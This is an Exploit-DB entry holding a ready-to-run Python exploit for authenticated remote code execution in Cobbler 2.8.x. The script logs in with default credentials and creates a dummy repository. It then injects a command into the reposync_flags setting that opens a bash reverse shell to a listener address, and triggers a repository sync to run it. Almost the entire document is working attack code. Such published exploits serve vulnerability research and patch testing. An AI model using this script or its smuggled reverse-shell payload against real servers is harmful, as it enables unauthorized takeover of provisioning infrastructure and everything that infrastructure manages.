Cobbler 2.8.0 - (Authenticated) Remote Code Execution

EDB-ID:

41628

CVE:

N/A




Platform:

Linux

Date:

2017-03-16


#!/usr/bin/python

"""
# Exploit title: Cobbler 2.8.x Authenticated RCE.
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com (@hack6tence)
# Date: 03-16-2017
# Vendor homepage: cobbler.github.io
# Software version: v.2.5.160805


Software Description
=====================
Cobbler is a Linux installation server that allows for rapid setup of network installation environments. It glues together and automates many associated Linux tasks so you do not have to hop between many various commands and applications when deploying new systems, and, in some cases, changing existing ones.
Cobbler can help with provisioning, managing DNS and DHCP, package updates, power management, configuration management orchestration, and much more.

Vulnerability Description
=========================
Authenticated RCE

"""
 
import uuid
import sys
import requests


# Custom variables
cobbler_server = 'http://192.168.2.235/cobbler_web/' 
cobbler_user = 'cobbler'
cobbler_pass = 'cobbler'
netcat_listener = '192.168.2.51/4444'


# Cobbler variables
cobbler_url = '%s/do_login' % cobbler_server
cobbler_settings_url = '%s/setting/save' % cobbler_server
cobbler_reposync = '%s/reposync' % cobbler_server
cobbler_reposave = '%s/repo/save' % cobbler_server
cobbler_repo_name = str(uuid.uuid4()).split('-')[0]



class Cobbler():
    def __init__(self):
        self.client = requests.session()
        self.client.get('%s' % cobbler_server)
        self.csrftoken = self.client.cookies['csrftoken']
        self.headers = dict(Referer=cobbler_url)
        self.login_data = dict(csrfmiddlewaretoken=self.csrftoken, next='/cobbler_web', username=cobbler_user, password=cobbler_pass)
        self.client.post(cobbler_url, data=self.login_data, headers=self.headers)

    def create_repo(self):
        print("Creating dummy repository...")
        self.repoinfo = dict(
            csrfmiddlewaretoken=self.csrftoken, 
            editmode='new', 
            subobject='False', 
            submit='Save', 
            arch='i386', 
            breed='yum', 
            comment='', 
            keep_updated='', 
            mirror='', 
            name=cobbler_repo_name, 
            owners='admin',
            rpm_list='',
            proxy='',
            apt_components='',
            apt_dists='',
            createrepo_flags='',
            environment='',
            mirror_locally='',
            priority='99',
            yumopts='')
        self.client.post(cobbler_reposave, data=self.repoinfo, headers=self.headers)

    def post_payload(self):
        print("Configuring reposync flags with the payload...")
        self.payload = dict(csrfmiddlewaretoken=self.csrftoken, editmode='edit', subobject='False', submit='Save', name='reposync_flags', value='-h; bash -i >& /dev/tcp/%s 0>&1 &' % netcat_listener)
        self.client.post(cobbler_settings_url, data=self.payload, headers=self.headers)

    def get_shell(self):
        self.create_repo()
        self.post_payload()
        print("Executing repository sync... expecting reverse shell. this may take a few seconds.")
        self.client.post(cobbler_reposync, data={'csrfmiddlewaretoken':self.csrftoken}, headers=self.headers)

if __name__ == '__main__':
    cobbler = Cobbler()
    cobbler.get_shell()
    sys.exit()